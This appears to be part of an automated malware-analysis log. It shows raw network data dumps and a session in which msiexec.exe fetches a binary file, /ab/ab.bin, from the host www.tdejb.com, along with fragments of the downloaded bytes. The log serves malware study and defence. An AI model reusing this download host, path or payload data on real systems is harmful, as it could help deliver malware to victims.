                                                                                                                  2024-12-05 09:46:01 UTC16384INData Raw: 4a 54 78 39 36 33 57 55 4b 6a 38 31 45 57 69 4f 6e 45 2f 68 4d 38 59 79 61 6e 6c 79 72 34 35 71 58 37 72 71 7a 43 32 57 71 63 74 66 74 4b 52 74 6a 6d 4d 56 62 51 4e 77 75 73 2b 6a 35 4f 50 4d 59 59 5a 70 57 52 71 38 68 64 55 62 56 6b 53 4a 57 37 56 64 55 72 57 7a 6f 68 47 54 7a 77 35 6c 69 4b 59 6c 73 76 33 6c 46 5a 56 79 48 56 6f 41 46 74 68 38 73 75 48 4b 68 43 50 42 7a 79 4c 7a 69 59 79 67 73 76 6b 38 74 58 73 65 78 2b 70 31 4c 33 73 70 76 58 34 4b 38 48 70 45 48 57 4b 33 33 58 51 31 39 6b 68 64 55 69 4b 72 38 37 6c 69 38 73 5a 2f 61 49 75 4a 46 53 6c 72 48 62 43 4b 4b 6e 76 37 79 34 75 2f 59 66 6e 33 31 32 44 61 4e 38 4d 47 55 6f 4e 48 2b 37 77 34 76 6b 66 5a 4e 33 4d 39 6a 42 30 7a 64 74 65 37 70 67 36 32 59 30 77 6e 47 48 6c 77 4c 5a 54 44 44 52 63
                                                                                                                  Data Ascii: JTx963WUKj81EWiOnE/hM8Yyanlyr45qX7rqzC2WqctftKRtjmMVbQNwus+j5OPMYYZpWRq8hdUbVkSJW7VdUrWzohGTzw5liKYlsv3lFZVyHVoAFth8suHKhCPBzyLziYygsvk8tXsex+p1L3spvX4K8HpEHWK33XQ19khdUiKr87li8sZ/aIuJFSlrHbCKKnv7y4u/Yfn312DaN8MGUoNH+7w4vkfZN3M9jB0zdte7pg62Y0wnGHlwLZTDDRc
                                                                                                                  2024-12-05 09:46:01 UTC16384INData Raw: 35 53 75 49 47 4e 67 6b 73 46 33 76 75 39 59 69 74 58 73 5a 33 63 6e 72 76 6c 47 4c 2f 32 38 45 39 71 76 6a 69 39 6e 30 6f 59 4e 33 6a 6d 6a 31 58 42 31 61 57 66 2f 4e 6c 62 4c 68 51 4a 73 42 49 4d 38 53 57 38 6f 63 4a 4c 4c 35 65 6c 73 77 68 52 39 39 75 75 74 50 2b 4b 35 73 79 7a 4e 44 42 38 79 71 45 49 59 58 6e 53 6b 41 75 49 61 6f 65 62 51 61 69 39 6e 65 4d 50 6f 4f 63 37 79 61 6a 34 32 34 73 2f 51 38 75 72 69 2f 4b 2b 4d 7a 43 73 64 63 37 67 74 4f 34 62 72 56 47 57 71 4f 31 30 2f 68 4d 31 72 32 7a 68 59 6e 54 4f 52 2b 46 6a 30 76 42 67 4d 35 7a 79 77 2f 7a 55 62 42 52 30 76 72 58 49 6b 7a 73 4b 2b 44 72 2b 41 79 6c 33 59 72 53 79 68 2f 4b 62 31 78 67 33 73 67 66 61 57 50 52 46 48 41 43 67 76 31 78 37 6a 56 56 54 59 52 2f 70 43 4f 68 67 39 70 37 61 72
                                                                                                                  Data Ascii: 5SuIGNgksF3vu9YitXsZ3cnrvlGL/28E9qvji9n0oYN3jmj1XB1aWf/NlbLhQJsBIM8SW8ocJLL5elswhR99uutP+K5syzNDB8yqEIYXnSkAuIaoebQai9neMPoOc7yaj424s/Q8uri/K+MzCsdc7gtO4brVGWqO10/hM1r2zhYnTOR+Fj0vBgM5zyw/zUbBR0vrXIkzsK+Dr+Ayl3YrSyh/Kb1xg3sgfaWPRFHACgv1x7jVVTYR/pCOhg9p7ar
                                                                                                                  2024-12-05 09:46:01 UTC16384INData Raw: 6d 67 62 45 5a 67 52 79 35 37 79 42 62 74 31 4d 72 6d 74 6e 30 50 51 4a 4c 48 7a 7a 58 6f 79 75 62 4c 6b 6d 5a 67 6b 51 5a 64 64 51 78 79 63 38 43 6c 6a 68 4d 77 70 4f 34 54 4d 4b 54 75 45 7a 43 6b 37 68 4d 2f 44 68 2b 4d 66 55 50 4d 6a 6e 73 7a 69 6b 4c 49 69 36 7a 72 37 45 2f 72 77 37 72 42 6b 62 4e 62 41 54 41 37 4b 46 43 55 74 6c 67 66 74 31 4d 67 70 4f 68 7a 7a 4e 65 4f 45 7a 43 6b 37 68 4d 77 70 4f 34 54 4d 4b 54 75 48 75 77 48 65 38 67 4d 49 65 57 5a 55 32 49 69 45 47 69 77 72 62 70 53 65 2f 34 4f 55 63 65 30 4e 47 50 69 62 4d 70 77 6a 36 74 6d 43 57 78 77 49 36 43 64 50 59 77 33 5a 4c 64 77 34 4b 6b 34 73 77 30 4a 30 36 48 6d 6f 36 69 6e 5a 52 6f 78 6c 74 58 79 49 37 70 4a 63 32 49 38 6c 52 46 36 49 47 73 58 46 39 4b 58 6b 6b 67 4c 4a 33 4d 72 4d
                                                                                                                  Data Ascii: mgbEZgRy57yBbt1Mrmtn0PQJLHzzXoyubLkmZgkQZddQxyc8CljhMwpO4TMKTuEzCk7hM/Dh+MfUPMjnszikLIi6zr7E/rw7rBkbNbATA7KFCUtlgft1MgpOhzzNeOEzCk7hMwpO4TMKTuHuwHe8gMIeWZU2IiEGiwrbpSe/4OUce0NGPibMpwj6tmCWxwI6CdPYw3ZLdw4Kk4sw0J06Hmo6inZRoxltXyI7pJc2I8lRF6IGsXF9KXkkgLJ3MrM
                                                                                                                  2024-12-05 09:46:01 UTC16384INData Raw: 2f 59 30 48 7a 4b 31 69 59 44 50 58 70 6c 4e 30 69 33 36 69 2b 53 49 6d 59 41 50 43 51 46 38 61 4d 71 6a 6b 71 69 6e 35 36 52 36 66 62 56 59 37 7a 55 36 42 49 45 59 78 59 41 4d 4a 2f 78 49 61 69 33 35 43 55 78 50 4a 59 41 4e 31 57 39 79 69 4d 71 69 48 43 74 6c 4c 47 42 7a 4c 52 73 7a 47 4a 59 2f 70 78 63 78 6e 4a 6a 50 59 35 74 6b 51 6a 35 61 48 44 70 37 71 59 42 73 6d 73 5a 6a 64 69 33 36 50 47 79 44 35 68 37 62 4b 7a 39 45 73 6a 48 65 39 39 49 38 53 34 7a 4d 4b 72 4a 4d 77 51 38 39 55 62 77 68 4f 34 64 74 47 31 56 79 79 70 78 4c 6a 4d 77 71 38 79 66 6a 52 4b 47 54 68 69 38 75 39 4d 51 70 4f 43 74 6b 34 71 57 58 78 53 72 46 73 62 77 68 4f 34 55 62 39 44 69 59 7a 74 6b 68 76 43 59 74 2b 75 71 38 42 4c 59 65 32 30 4d 2f 52 44 7a 2b 33 2b 38 54 4a 4c 7a 66
                                                                                                                  Data Ascii: /Y0HzK1iYDPXplN0i36i+SImYAPCQF8aMqjkqin56R6fbVY7zU6BIEYxYAMJ/xIai35CUxPJYAN1W9yiMqiHCtlLGBzLRszGJY/pxcxnJjPY5tkQj5aHDp7qYBsmsZjdi36PGyD5h7bKz9EsjHe99I8S4zMKrJMwQ89UbwhO4dtG1VyypxLjMwq8yfjRKGThi8u9MQpOCtk4qWXxSrFsbwhO4Ub9DiYztkhvCYt+uq8BLYe20M/RDz+3+8TJLzf
                                                                                                                  2024-12-05 09:46:02 UTC16384INData Raw: 43 30 37 68 73 2f 65 59 5a 63 7a 69 69 41 62 4d 39 63 64 30 78 77 74 4f 34 59 6e 74 53 77 72 46 4d 72 42 67 32 64 50 71 72 39 76 38 69 65 36 79 79 4f 54 4c 70 76 6e 50 49 33 70 2b 67 42 78 68 6a 71 70 71 70 76 35 50 34 54 50 69 72 72 45 77 43 73 34 61 4a 6c 4a 33 4d 4e 71 56 54 75 45 7a 6a 72 42 6f 6a 74 42 50 34 54 4f 31 36 4f 4d 58 74 73 38 57 7a 6a 46 58 63 4c 4c 39 37 79 34 6a 73 53 68 67 7a 58 67 67 59 45 35 32 5a 50 4d 7a 43 6b 46 6c 55 5a 4f 78 48 72 4c 6c 74 44 63 65 6e 42 6b 58 38 68 48 46 58 4f 6b 4c 54 75 48 62 34 42 50 69 4d 32 79 35 4a 39 48 33 78 33 53 77 43 30 37 68 75 73 67 6f 5a 50 6c 59 4b 47 54 6a 67 64 74 69 4d 67 70 4f 43 56 48 37 73 52 35 62 71 2b 4a 47 64 34 75 31 4e 6f 47 62 5a 49 65 79 39 5a 2b 38 73 69 5a 71 58 5a 70 50 75 57 41
                                                                                                                  Data Ascii: C07hs/eYZcziiAbM9cd0xwtO4YntSwrFMrBg2dPqr9v8ie6yyOTLpvnPI3p+gBxhjqpqpv5P4TPirrEwCs4aJlJ3MNqVTuEzjrBojtBP4TO16OMXts8WzjFXcLL97y4jsShgzXggYE52ZPMzCkFlUZOxHrLltDcenBkX8hHFXOkLTuHb4BPiM2y5J9H3x3SwC07husgoZPlYKGTjgdtiMgpOCVH7sR5bq+JGd4u1NoGbZIey9Z+8siZqXZpPuWA
                                                                                                                  2024-12-05 09:46:02 UTC16384INData Raw: 2b 58 4c 5a 76 44 37 50 43 71 77 58 39 39 70 6a 6c 73 63 42 4d 68 4c 54 5a 50 31 35 61 66 39 70 33 2f 41 4c 4d 4b 66 53 4e 46 2f 44 78 45 36 30 6b 71 6c 72 2b 4f 6b 74 51 65 63 5a 30 59 2f 76 66 68 4b 2b 4b 7a 6f 78 37 57 6b 61 6b 45 38 38 72 73 51 41 6d 6b 4c 4c 4f 57 75 4f 73 62 71 79 50 6d 6f 58 75 39 4e 44 73 6f 6a 52 4b 4f 42 36 69 37 30 76 4d 34 6e 63 59 4d 44 36 66 73 74 76 69 37 30 45 5a 4b 4c 4a 73 4b 2b 44 72 2b 67 71 6c 79 68 6b 77 48 68 71 6a 55 76 4d 4e 62 59 70 53 79 59 47 47 71 66 55 78 59 51 39 72 4f 65 4e 71 79 35 62 6f 67 49 49 57 74 77 70 39 53 7a 56 49 59 43 71 46 74 77 43 57 33 79 4f 6c 37 69 32 77 42 56 67 48 79 37 77 31 51 31 36 78 33 7a 62 43 30 37 68 75 73 6b 64 74 34 30 77 6a 65 33 73 69 37 69 61 38 72 6e 59 59 4d 55 6e 5a 31 35
                                                                                                                  Data Ascii: +XLZvD7PCqwX99pjlscBMhLTZP15af9p3/ALMKfSNF/DxE60kqlr+OktQecZ0Y/vfhK+Kzox7WkakE88rsQAmkLLOWuOsbqyPmoXu9NDsojRKOB6i70vM4ncYMD6fstvi70EZKLJsK+Dr+gqlyhkwHhqjUvMNbYpSyYGGqfUxYQ9rOeNqy5bogIIWtwp9SzVIYCqFtwCW3yOl7i2wBVgHy7w1Q16x3zbC07huskdt40wje3si7ia8rnYYMUnZ15
                                                                                                                  2024-12-05 09:46:02 UTC16384INData Raw: 43 6b 37 68 74 74 4c 31 6b 67 45 39 42 47 44 41 56 30 55 4e 54 49 2b 65 59 4d 42 34 52 4d 4c 68 62 4d 73 78 73 73 6e 6f 4c 54 51 53 70 59 61 49 65 45 70 61 37 46 6e 31 37 46 33 75 55 47 4c 49 42 6b 46 6c 6a 52 31 4e 34 57 69 4c 76 66 67 4f 65 73 4a 6c 78 34 75 78 50 6e 78 4e 58 32 44 41 58 68 74 36 49 32 79 35 49 67 67 6d 7a 35 78 50 46 58 62 68 4d 77 58 44 6c 67 72 31 73 57 44 59 4d 53 4b 78 63 49 36 78 43 68 47 78 71 57 64 33 35 63 38 53 66 30 45 68 50 41 72 62 7a 78 4c 38 6f 47 4f 6f 73 73 6e 79 65 63 71 4f 4b 42 62 30 75 31 49 4b 4d 59 36 6f 5a 4f 76 4a 7a 78 35 74 4c 55 75 62 74 2f 54 4c 4b 4c 66 61 4a 6f 66 6d 50 68 5a 67 42 79 36 68 48 7a 35 7a 4b 4e 6a 6a 4d 6f 56 67 42 79 34 54 38 64 52 59 79 69 69 79 38 4a 39 47 30 47 54 50 35 52 64 70 6d 63 43
                                                                                                                  Data Ascii: Ck7httL1kgE9BGDAV0UNTI+eYMB4RMLhbMsxssnoLTQSpYaIeEpa7Fn17F3uUGLIBkFljR1N4WiLvfgOesJlx4uxPnxNX2DAXht6I2y5Iggmz5xPFXbhMwXDlgr1sWDYMSKxcI6xChGxqWd35c8Sf0EhPArbzxL8oGOossnyecqOKBb0u1IKMY6oZOvJzx5tLUubt/TLKLfaJofmPhZgBy6hHz5zKNjjMoVgBy4T8dRYyiiy8J9G0GTP5RdpmcC
                                                                                                                  2024-12-05 09:46:02 UTC16384INData Raw: 43 6b 37 68 4d 77 70 4f 34 54 4d 4b 54 6a 79 47 6e 6e 4e 33 55 32 4c 7a 73 54 6e 39 48 56 6f 74 30 35 42 4a 73 76 6e 45 4f 31 52 51 7a 78 49 6a 5a 50 63 54 75 67 48 52 38 6e 35 6f 53 4a 55 49 2b 2f 34 36 59 4d 56 6e 35 62 50 6e 48 4f 57 43 39 45 46 48 76 6d 68 52 59 70 67 38 35 4f 36 64 4b 2f 2b 4f 42 5a 47 74 75 76 2b 75 4a 30 39 34 6d 4a 58 59 6b 6f 49 30 75 72 53 58 4a 4c 6b 37 34 37 32 7a 70 6c 44 7a 36 72 5a 34 36 68 52 79 57 5a 54 42 2b 6f 4e 38 59 44 63 75 55 5a 61 6e 32 42 68 66 39 51 59 64 6d 4c 4c 38 30 5a 61 47 38 38 38 50 70 79 6e 5a 4e 72 4c 38 5a 6c 6a 6d 76 38 38 50 76 4e 6a 55 2f 62 6f 4d 70 59 45 67 58 30 6e 4c 4e 47 77 35 6f 37 4e 45 2b 6d 47 6c 35 57 78 44 6d 5a 79 79 7a 32 67 51 79 51 6b 63 75 4b 4d 51 61 5a 56 71 71 6f 4a 55 7a 39 55
                                                                                                                  Data Ascii: Ck7hMwpO4TMKTjyGnnN3U2LzsTn9HVot05BJsvnEO1RQzxIjZPcTugHR8n5oSJUI+/46YMVn5bPnHOWC9EFHvmhRYpg85O6dK/+OBZGtuv+uJ094mJXYkoI0urSXJLk7472zplDz6rZ46hRyWZTB+oN8YDcuUZan2Bhf9QYdmLL80ZaG888PpynZNrL8Zljmv88PvNjU/boMpYEgX0nLNGw5o7NE+mGl5WxDmZyyz2gQyQkcuKMQaZVqqoJUz9U


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.449737202.71.109.2284435660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-05 09:46:26 UTC167OUTGET /ab/ab.bin HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                  Host: www.tdejb.com
                                                                                                                  Cache-Control: no-cache
                                                                                                                  2024-12-05 09:46:27 UTC223INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 05 Dec 2024 09:46:26 GMT
                                                                                                                  Server: Apache
                                                                                                                  Last-Modified: Tue, 03 Dec 2024 03:27:16 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Length: 449600
                                                                                                                  Connection: close
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  2024-12-05 09:46:27 UTC7969INData Raw: e4 47 1f 45 3d dd a3 e0 6d 19 db 76 50 37 22 40 fe 29 88 ff 9c 7c 0b 11 04 fc dc ee e6 0b c2 1d 5b 94 dc 82 ef c4 e7 1d a6 e1 fc 84 69 99 af 58 1e ab b9 4a 0e e6 e3 79 a1 6a 74 10 24 8a a5 2d 99 5f fa f9 c4 a1 54 94 8c 94 52 0a 80 b8 26 bd 1e c1 35 f2 74 cf a0 2d 09 a9 df 4e 72 07 af 69 cf 13 e3 0d 6c dc c7 08 65 4d 87 fd 1e 2a a4 07 d2 85 a5 7c af 18 58 d6 ba 87 3d 88 2e 1d 14 a3 fe 66 f0 79 4c 83 90 93 0e e0 9d 4f ba 29 bb e4 92 a6 c0 1c e2 c6 08 f3 81 d7 02 23 81 aa ba 4e 27 17 4d 26 b2 ff c2 bf b0 a6 81 b2 f1 71 1f 79 99 0e c2 4f 27 85 34 34 7c 30 d9 12 e9 25 80 c6 b0 59 04 58 35 50 ed 39 a6 ec d5 7a ad 85 7b 00 f9 03 d9 7f 04 ea fc ec 2f 3d c7 fd 5c 46 c3 3f 1a fb b9 21 ab 26 0a ec 6c ee ec 9c 7a e5 08 31 cb 0a 50 64 fd ae 9e a5 ee 74 60 6e 6d a3 0c
                                                                                                                  Data Ascii: GE=mvP7"@)|[iXJyjt$-_TR&5t-NrileM*|X=.fyLO)#N'M&qyO'44|0%YX5P9z{/=\F?!&lz1Pdt`nm
                                                                                                                  2024-12-05 09:46:27 UTC8000INData Raw: 94 c8 5a df 80 bd 7e 84 86 d2 d4 7b 9c af fc 68 81 ad ee 90 97 14 86 8b 6f a7 bd 94 80 a5 ad 7e 12 f9 d6 1c d9 51 c5 35 ab c2 e1 47 a1 0c bb ec e3 30 b7 01 ca 08 82 16 56 50 6c ed 85 59 04 b0 6c 70 10 91 07 29 70 f8 17 cd 02 00 77 d1 3d ab 55 b4 d1 eb e0 0d 83 b4 34 92 41 f5 5a 49 54 56 84 1d d9 1b 28 d9 15 1c ac f0 99 11 0a c4 7a 86 4d 78 5d 9a 8b 6d 42 19 d9 19 18 d6 40 9d ec 84 5a 94 1a b7 b3 6f b5 74 03 c4 f6 9e ae ac 28 3c e0 18 d9 b7 f2 fe 5f 7b b5 4c 35 bc 5e 97 72 67 f4 58 8f 9b 02 9b d1 a4 ec c5 08 c0 ab 9a 40 92 ef bc b2 3c 4b 7e 94 dd f2 bf cc 23 89 ad 77 cc ec 20 43 63 b9 b4 f5 b6 e7 48 a1 72 fd 7e 5e 54 38 f2 40 c6 da 71 6e 3e 45 db 5c 80 09 03 4a b2 ca c3 ce 60 f6 f5 96 ac a7 5e 58 99 69 cb 81 54 92 df a4 6c 1d b7 b3 f8 65 72 f9 1a d7 9b fb
                                                                                                                  Data Ascii: Z~{ho~Q5G0VPlYlp)pw=U4AZITV(zMx]mB@Zot(<_{L5^rgX@<K~#w CcHr~^T8@qn>E\J`^XiTler
                                                                                                                  2024-12-05 09:46:27 UTC8000INData Raw: e6 f2 97 50 41 1c 7e 14 68 71 2e 90 15 88 8e 21 e7 bc ce da cb 8a a9 2f a6 f1 bf f4 22 8e 01 fa 0e ac 90 5a 57 fd 5c 55 62 9c 65 71 cb 28 39 63 6d 26 b2 8b 6d 82 47 04 ec ae 02 55 ce 9e 77 e1 94 76 84 f9 b9 d0 6e de ae 0c 21 d2 c4 c0 93 db 8f 74 92 9f d0 d5 2d 93 83 f1 30 c9 a9 a9 30 98 55 1c aa 25 22 ab 48 b0 d4 2d 60 26 12 2c ff 69 ed c5 96 d1 82 f5 3b 99 fc f3 79 ee 90 f2 d8 92 95 59 09 62 2a 7b 3d 98 6d 74 89 d3 8c 27 ca 9b c4 a1 90 24 c4 81 82 e7 67 e4 b8 b2 df e4 6b bf ee 5f 27 bd c6 ae 60 9c e5 2e 3a 99 d4 ca 64 96 f6 f5 67 bc 3c 9e 6f af ea 29 64 40 65 ea b4 ae 0f 30 c7 3a 23 79 20 7b b4 af e7 f3 46 08 e4 bc 76 a9 a8 f0 71 5b 2f df 16 2e 32 6d 79 5c 5b 0c 97 41 19 58 88 8c ac bd 69 03 9a 13 b4 be 95 7a 16 49 13 cf 1d 46 84 a9 88 7a b8 8f 0d ad f1
                                                                                                                  Data Ascii: PA~hq.!/"ZW\Ubeq(9cm&mGUwvn!t-00U%"H-`&,i;yYb*{=mt'$gk_'`.:dg<o)d@e0:#y {Fvq[/.2my\[AXizIFz
                                                                                                                  2024-12-05 09:46:27 UTC8000INData Raw: 56 8f 45 fb 31 ec 2d 37 05 9d fe f0 18 d8 18 48 d8 37 4f 39 c4 f6 40 ee fe d4 8d fd c8 90 cd 48 94 6e ad 6b 5d 73 62 50 47 d9 ff c4 9f f8 25 2e d3 4c ab 5e 26 3d 59 90 c0 c1 f2 1f 7c 47 e5 5a b8 59 44 9e b1 7f c6 bc 70 35 55 1b b1 4e 13 11 a1 90 64 63 99 6d 20 ff 79 39 66 09 e5 07 70 74 87 f1 f7 1c 9c 74 78 7c 1d 1a 48 15 1e aa 1a 9d 77 83 22 1e 76 85 ca 54 f2 54 a0 7a 88 4c 5e ad 68 20 8d c2 7a 3e d1 a0 81 1a b9 31 b0 a7 70 ea 13 a1 f4 19 5c a8 90 bf 46 c9 ae 94 9b 2b c8 5c 52 fc 06 dc c0 1d 64 34 84 69 84 6c ef c5 d0 1a cc 3b c5 7e c6 86 d4 de bd 17 80 63 3b ac 44 08 1b b0 e3 af fa e0 ba e0 7c 11 76 21 e0 eb 2a 55 19 a8 c5 03 20 6d 81 30 2b 4e d9 c0 55 79 b6 71 79 2a 64 29 91 94 c4 ba a2 68 43 9e 11 45 5e e7 ea c4 47 69 7a 09 e4 3e d3 4d 5d 36 e8 02 ba
                                                                                                                  Data Ascii: VE1-7H7O9@Hnk]sbPG%.L^&=Y|GZYDp5UNdcm y9fpttx|Hw"vTTzL^h z>1p\F+\Rd4il;~c;D|v!*U m0+NUyqy*d)hCE^Giz>M]6
                                                                                                                  2024-12-05 09:46:27 UTC8000INData Raw: 52 d9 1a a5 bb f8 64 b4 28 ae c6 60 db 80 56 85 70 6f 9b ee b1 09 35 47 fe 27 51 5d 6d 61 a8 85 58 e1 4e 14 43 ac d4 9b 4b fe 1c 15 b1 70 68 52 cf 77 61 c9 70 c0 67 e0 69 dc 23 9d c1 45 b8 86 b1 af 3f 51 6a a1 79 c7 df 01 32 64 17 30 98 ba 9b c5 85 15 c7 34 58 c5 70 78 63 55 88 4d a8 34 da ab b3 81 df a0 a0 b1 95 bb 1a 48 93 da b3 c9 e7 df 35 84 3e 05 bc 17 a2 d3 23 02 0b 2a 06 b9 42 92 27 92 80 e7 90 7a 01 88 b9 b3 23 a3 3c 27 9a db ae 05 b3 0e 13 c7 84 c7 10 8e 8a e9 ed a2 48 5c 7d 10 b8 f0 f8 fb cc 9b b6 e4 69 a2 6b 4b 8d a2 84 12 a5 54 6e e9 c6 c9 70 48 b2 61 8a b0 a0 62 56 d6 81 2c ca 6b cb 23 18 79 7b cf fe 54 0e c1 80 84 73 fd 26 02 c3 81 7e 73 2a 89 ee 3b ef 53 c6 6b c3 98 75 ee 23 cc 88 ca 88 78 d6 ee f7 d2 63 4c 5f e9 2a 57 28 4a be 5b ba 2a cd
                                                                                                                  Data Ascii: Rd(`Vpo5G'Q]maXNCKphRwapgi#E?Qjy2d04XpxcUM4H5>#*B'z#<'H\}ikKTnpHabV,k#y{Ts&~s*;Sku#xcL_*W(J[*
                                                                                                                  2024-12-05 09:46:27 UTC8000INData Raw: 97 0c 2e ef fd a9 89 bc 69 4b 8d c4 88 5c 0f dc b5 40 0c d7 e5 82 74 b6 ca 64 25 1f 20 27 28 13 ed 94 4b d5 bd c9 5b fc b1 f3 a2 da e9 13 b0 00 a7 a5 80 fc 7f 3d 46 63 5f c9 d8 66 8c 4f fc f1 90 f3 fe 2c f1 c4 cb 47 79 11 a5 f3 53 4d 74 7d 15 84 c3 ad bc 21 ee 8a 8a dd 57 90 9b 3d bf 69 2c 28 fd a1 6d c1 f2 e6 8b d7 21 8a 74 7d 34 cf 65 ef e2 51 13 97 1e 95 02 32 82 7c bc 9c c4 61 a7 ff 12 0d 9a 49 0d a0 18 9f a2 fc ca 01 fe 0d 95 1d 19 17 4f 01 4b 59 fc fa 52 7c bf e6 f8 10 fb 28 05 0d da 7f b9 3d cc e7 97 fa 93 26 ff 12 23 40 83 3c a2 7d a9 63 f9 81 44 0c 69 be 99 79 e3 7e ff a3 73 bf 9f da 97 ba 4c a7 7f f4 08 fe 19 49 b6 1b 8b ba 59 be 95 d9 13 1d 7f ab cd b2 25 a5 b8 d0 ff bb 5f 30 91 e0 8b bd 9d bd d4 fa 78 a7 27 dc f8 c2 3b 1b 6c 68 84 8b c0 fa 2a
                                                                                                                  Data Ascii: .iK\@td% '(K[=Fc_fO,GySMt}!W=i,(m!t}4eQ2|aIOKYR|(=&#@<}cDiy~sLIY%_0x';lh*
                                                                                                                  2024-12-05 09:46:27 UTC8000INData Raw: 5e e0 34 e6 79 3e d2 8b 8c 98 b5 59 1f b0 00 a9 5f 6e 88 7d 7c 52 06 f2 39 05 b9 3a 82 26 c6 8c a4 fa 7f 38 22 08 1e ae 34 11 e3 ad 1f 74 62 4d 97 ca 29 36 3c 97 63 8c 86 4e ff a7 94 a6 cb fc 26 d5 cc af a3 f1 05 ec 15 f8 c9 34 f1 ec 69 f7 1c 66 36 cd f5 34 de 72 06 d0 1f 2f e9 3d 5c 87 56 fb 22 d3 76 d4 b6 13 de 67 8a 99 61 68 d5 0b 23 ae f4 39 2f 93 2d 68 cd 12 ff 07 10 00 5d 6f 45 4c 9b 78 6e 79 37 bf b2 93 73 39 8a e2 bd ad 20 ef 4d eb ec 08 a8 fb 65 60 ac 93 0c 9f 58 94 fe b7 5f 3b 09 16 ed cf 4b 51 49 cb cf 92 bf 78 4d 8e 6d 60 21 92 44 8b f1 e4 37 4f 15 67 82 68 b3 bd 52 57 32 fd 8e bf 61 75 54 c8 e4 94 d6 8b 20 32 81 ff 98 af 28 47 7f 13 88 c4 64 3e dc 7f 9c f0 1c 35 97 e9 eb b1 db 39 8c 0e c7 d3 ca b5 b3 40 99 21 46 7c b6 82 cd 68 14 40 4d 40 29
                                                                                                                  Data Ascii: ^4y>Y_n}|R9:&8"4tbM)6<cN&4if64r/=\V"vgah#9/-h]oELxny7s9 Me`X_;KQIxMm`!D7OghRW2auT 2(Gd>59@!F|h@M@)
                                                                                                                  2024-12-05 09:46:27 UTC8000INData Raw: 01 b0 75 a0 8f 57 29 8c 6f 5e e2 fc 7a 57 c0 cc d7 d6 69 93 7e a4 92 1a de 46 22 f8 10 65 e9 14 75 7c ad 6f fc 33 b3 3e fc 6f fb 11 54 07 d5 de 01 aa e3 22 03 18 2c 88 bc 3e ad d7 2c 6b 3b 0a c2 73 2d 0e ac 2d b6 b0 f8 3b e3 2f 2b 0f a8 f9 cb 7f 10 d3 e9 7d 92 c1 bb 10 15 4b 85 99 14 35 05 04 ba 3e c6 d5 d8 f5 ce 95 83 0b af 80 27 57 d6 5f b9 f3 a5 ce 70 ea 48 24 eb 2a eb 06 7e 68 1f d4 e2 6d 29 e7 ef 09 b4 4c 57 3a 1f d9 ac 4a 11 84 74 7d 7f df 59 f5 2b 5f 1e 89 ef 1d c4 64 f1 20 a3 dd a8 36 48 5f ff 9f 9d 0e 84 04 aa 8d 2a d4 30 ab 91 c4 33 a3 24 bb f3 41 30 03 d5 ed 8a b4 4a 42 43 8c 67 16 91 dd 15 a6 a3 3f 9d 58 24 a6 a7 8a 70 19 0c 3f 89 31 09 d5 e8 f7 df 10 76 80 4f 23 6c 2e 18 45 af 60 47 52 f5 3d 5f ee 3a 78 2a ae 5d 52 d9 c4 3d 3b 37 37 ab 08 61
                                                                                                                  Data Ascii: uW)o^zWi~F"eu|o3>oT",>,k;s--;/+}K5>'W_pH$*~hm)LW:Jt}Y+_d 6H_*03$A0JBCg?X$p?1vO#l.E`GR=_:x*]R=;77a
                                                                                                                  2024-12-05 09:46:27 UTC8000INData Raw: 02 41 ff ae ab 1b 6d ae 55 91 14 fd d6 c7 1b 06 b8 51 7c f9 56 87 d5 14 ab d5 77 6d 45 97 63 00 e4 99 19 44 cc 09 80 d2 f3 eb d9 2f bc af dc 6b 3d f4 f6 a3 b7 53 d4 53 c6 86 81 7b 2b b8 56 ed 83 30 a0 c0 40 10 ef 5f b2 9d 48 b6 d0 a7 00 2a 6d 58 46 ba d6 b7 dd 53 65 23 54 22 b4 e6 d1 57 86 54 cc ce dd 51 cb 61 2e d0 20 49 c0 1d 02 ab 00 75 66 95 4a 5b bc 55 df cd 28 2b fd 7a 4d 3c 55 4d 52 27 c3 4d 37 cb a4 d3 15 e1 58 94 34 99 3e ac c8 09 66 e5 38 a8 b7 89 2c 0e 6c 8e 46 65 a1 2e 3b 27 bb 3a 4b 01 75 fb 03 6d ed 31 7c 8f 42 3f 6d a5 fa a7 2b 22 7b fa 6f 1c f2 9e 6b a6 94 94 0f 4d b3 69 65 e2 70 49 8c 75 61 a4 ae 8e 85 2f 34 51 c0 25 2a b2 ee 95 0a 4b 46 44 2b 71 7f fe 13 1e b1 e1 33 db 28 b8 00 8c 49 b9 1a 96 92 0c 83 1e fd fe 67 63 29 72 b4 40 b2 01 51
                                                                                                                  Data Ascii: AmUQ|VwmEcD/k=SS{+V0@_H*mXFSe#T"WTQa. IufJ[U(+zM<UMR'M7X4>f8,lFe.;':Kum1|B?m+"{okMiepIua/4Q%*KFD+q3(Igc)r@Q
                                                                                                                  2024-12-05 09:46:27 UTC8000INData Raw: d3 f5 8c f0 02 82 cc ae c5 7f b7 4d 26 2f 5c ec f1 37 6d d9 1c 4f 30 f8 e6 6d 21 6f 25 35 48 9e 3e 24 d7 43 8a 87 2c 4b 93 c9 9d a0 18 5c f8 e9 b2 7a e0 ee d5 54 f1 3e d4 3c 7f 15 93 5d 4f 03 29 ba a6 54 28 ae 16 8c eb 86 93 b7 02 14 11 84 1d cc 4a 5e 05 0f 05 fd 42 94 37 d7 a9 45 cc b2 48 85 cd bd e3 53 df 24 e0 b8 fd b0 f7 05 ea df 43 e4 f1 a3 01 52 24 2c 5f 32 4e 67 72 35 22 08 43 82 9f aa aa 32 10 49 48 bd a5 9e 15 a5 e5 b7 98 d2 71 40 f5 d3 47 a5 d0 d2 fb 77 62 0f 35 7c 79 60 02 54 e9 58 7e b0 4d f2 e8 78 9c 69 a5 86 46 26 24 70 7a 07 23 3b 6a 04 f9 b4 91 72 2c 53 8f a2 2c 9f ea f3 a8 37 bd 5d 6a bf 7c 7d d8 34 6d 61 6f 5c b1 5f a6 b3 0f c6 ff 25 ab 76 b6 e7 e3 b1 91 c9 89 9f 4a 98 65 47 da 85 c3 64 6f 82 bc bb fb ea 38 62 96 54 78 9f bc 2c e1 71 52
